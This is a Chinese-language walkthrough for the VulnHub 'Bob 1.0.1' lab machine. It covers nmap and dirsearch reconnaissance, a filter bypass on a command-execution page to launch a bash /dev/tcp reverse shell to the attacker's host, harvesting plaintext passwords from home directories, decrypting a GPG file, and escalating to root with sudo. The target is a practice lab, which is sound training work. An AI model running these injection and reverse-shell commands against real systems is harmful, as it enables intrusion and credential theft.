Bob_v1.0.1靶机

信息收集：

靶机地址：https://www.vulnhub.com/entry/bob-101,226/

（1）ip扫描

nmap 192.168.254.0/24 -sn | grep -B 2 '00:0C:29:C9:15:16'

（2）端口扫描

nmap -A 192.168.254.136 -p- 

（3）目录扫描

dirsearch -u  http://192.168.254.136

（4）拼接一下扫描的目录没啥发现，一个robots文件，看看内容

（5）访问了半天，发现只有/dev_shell.php有用，是一个命令执行的页面

（6）dev_shell.php页面发现存在过滤，一些命令无法执行，执行whoami | ls，发现一个备份文件

（7）通过访问页面直接下载下来，查看文件内容，看到过滤了一些命令

192.168.254.136/dev_shell.php.bak

getshell：

（1）直接尝试反弹shell

nc -lvnp 4444

（2）浏览器执行

whoami | pwd&echo "bash -i >& /dev/tcp/192.168.254.129/4444 0>&1" | bash

（3）反弹成功

提权：

（1）cd到home目录下，查看，发现有四个用户的家目录，先到bob目录下查看，发现一个可能存在密码的文件.old_passwordfile.html

cd /home 
ls
cd bob
ls -al

（2）查看文件，得到 jc 和 seb 的密码

cat 
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3

（3）在 Documents 下发现一个加密的文件 login.txt.gpg 和一个目录 Secret

（4）在 /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here 下，发现了 notes.sh

（5）查看文件内容，没看懂，网上搜了一下，是藏头诗，密钥为 HARPOCRATES

（6）返回DOcuments目录下，解密 login.txt.gpg ，没有权限

gpg -d login.txt.gpg

（7）ssh登录其他用户尝试

ssh jc@192.168.254.136 -p 25468
Qwerty

（8）再次解密，得到 bob 的密码

cd /home/bob/Documents
gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

bob:b0bcat_

（9）再看看 elliot 的家目录，发现一个 theadminisdumb.txt 文件

（10）查看内容，这里提到他把密码改为了 theadminisdumb

elliot:theadminisdumb

（11）ssh连接bob用户

ssh bob@192.168.254.136 -p 25468
b0bcat_

（12）查看当前权限，显示为all，所有命令都可以

sudo -l

（13）直接sudo su 提权成功